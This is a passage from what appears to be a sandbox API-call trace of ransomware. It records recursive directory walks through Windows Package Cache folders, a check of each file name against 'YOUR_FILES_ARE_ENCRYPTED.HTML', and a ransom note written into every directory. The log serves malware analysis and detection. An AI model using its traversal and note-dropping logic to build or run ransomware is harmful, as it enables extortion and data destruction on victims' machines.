Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*" [0157.536] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cebb750, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0157.537] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cebb750, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.537] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x972dc300, ftCreationTime.dwHighDateTime=0x1d287fd, ftLastAccessTime.dwLowDateTime=0x972dc300, ftLastAccessTime.dwHighDateTime=0x1d287fd, ftLastWriteTime.dwLowDateTime=0x972dc300, ftLastWriteTime.dwHighDateTime=0x1d287fd, nFileSizeHigh=0x0, nFileSizeLow=0x9990e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows6.1-KB2999226-x86.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0157.537] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\Windows6.1-KB2999226-x86.msu") returned 121 [0157.537] lstrcmpW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.538] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0157.538] lstrlenW (lpString=".msu") returned 4 [0157.538] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0157.538] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x972dc300, ftCreationTime.dwHighDateTime=0x1d287fd, ftLastAccessTime.dwLowDateTime=0x972dc300, ftLastAccessTime.dwHighDateTime=0x1d287fd, ftLastWriteTime.dwLowDateTime=0x972dc300, ftLastWriteTime.dwHighDateTime=0x1d287fd, nFileSizeHigh=0x0, nFileSizeLow=0x9990e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows6.1-KB2999226-x86.msu", cAlternateFileName="WINDOW~1.MSU")) returned 0 [0157.538] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0157.538] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0157.538] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\patch\\x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0157.538] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0157.541] CloseHandle (hObject=0x4a8) returned 1 [0157.541] GetProcessHeap () returned 0x270000 [0157.543] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0157.543] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cebb750, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x86", cAlternateFileName="")) returned 0 [0157.543] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.543] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0157.543] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\patch\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.544] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.546] CloseHandle (hObject=0x5a0) returned 1 [0157.547] GetProcessHeap () returned 0x270000 [0157.548] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.548] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cebb750, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cebb750, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Patch", cAlternateFileName="")) returned 0 [0157.548] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.548] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0157.548] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.549] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.551] CloseHandle (hObject=0x598) returned 1 [0157.552] GetProcessHeap () returned 0x270000 [0157.553] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.553] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cbe7d30, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x1cbe7d30, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x1cbe7d30, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0157.553] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.553] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0157.553] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.554] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.556] CloseHandle (hObject=0x58c) returned 1 [0157.557] GetProcessHeap () returned 0x270000 [0157.558] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.563] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87c35b0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="D4036846864773E3D647F421DFE7F6CA536E307B", cAlternateFileName="D40368~1")) returned 1 [0157.563] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B") returned 73 [0157.563] GetProcessHeap () returned 0x270000 [0157.563] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.566] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B") returned="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B" [0157.566] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*" [0157.566] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87c35b0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.566] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87c35b0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.567] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0157.567] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages") returned 82 [0157.567] GetProcessHeap () returned 0x270000 [0157.567] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.568] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages" [0157.568] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*" [0157.568] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.568] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.568] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Patch", cAlternateFileName="")) returned 1 [0157.568] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch") returned 88 [0157.569] GetProcessHeap () returned 0x270000 [0157.569] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.571] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch") returned="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch" [0157.571] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*" [0157.571] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.572] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.572] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x86", cAlternateFileName="")) returned 1 [0157.572] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86") returned 92 [0157.572] GetProcessHeap () returned 0x270000 [0157.572] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0157.573] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86" [0157.573] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*" [0157.573] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0157.573] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.574] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7584c900, ftCreationTime.dwHighDateTime=0x1d0a14b, ftLastAccessTime.dwLowDateTime=0x7584c900, ftLastAccessTime.dwHighDateTime=0x1d0a14b, ftLastWriteTime.dwLowDateTime=0x7584c900, ftLastWriteTime.dwHighDateTime=0x1d0a14b, nFileSizeHigh=0x0, nFileSizeLow=0x98303, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows6.1-KB2999226-x86.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0157.574] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\Windows6.1-KB2999226-x86.msu") returned 121 [0157.574] lstrcmpW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.574] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0157.574] lstrlenW (lpString=".msu") returned 4 [0157.574] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0157.574] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7584c900, ftCreationTime.dwHighDateTime=0x1d0a14b, ftLastAccessTime.dwLowDateTime=0x7584c900, ftLastAccessTime.dwHighDateTime=0x1d0a14b, ftLastWriteTime.dwLowDateTime=0x7584c900, ftLastWriteTime.dwHighDateTime=0x1d0a14b, nFileSizeHigh=0x0, nFileSizeLow=0x98303, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows6.1-KB2999226-x86.msu", cAlternateFileName="WINDOW~1.MSU")) returned 0 [0157.574] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0157.574] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0157.575] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\patch\\x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0157.575] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0157.578] CloseHandle (hObject=0x4a8) returned 1 [0157.578] GetProcessHeap () returned 0x270000 [0157.579] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0157.579] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x86", cAlternateFileName="")) returned 0 [0157.580] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.580] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0157.580] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\patch\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.580] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.583] CloseHandle (hObject=0x5a0) returned 1 [0157.583] GetProcessHeap () returned 0x270000 [0157.585] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.585] FindNextFileW (in: hFindFile=0x42f3180, 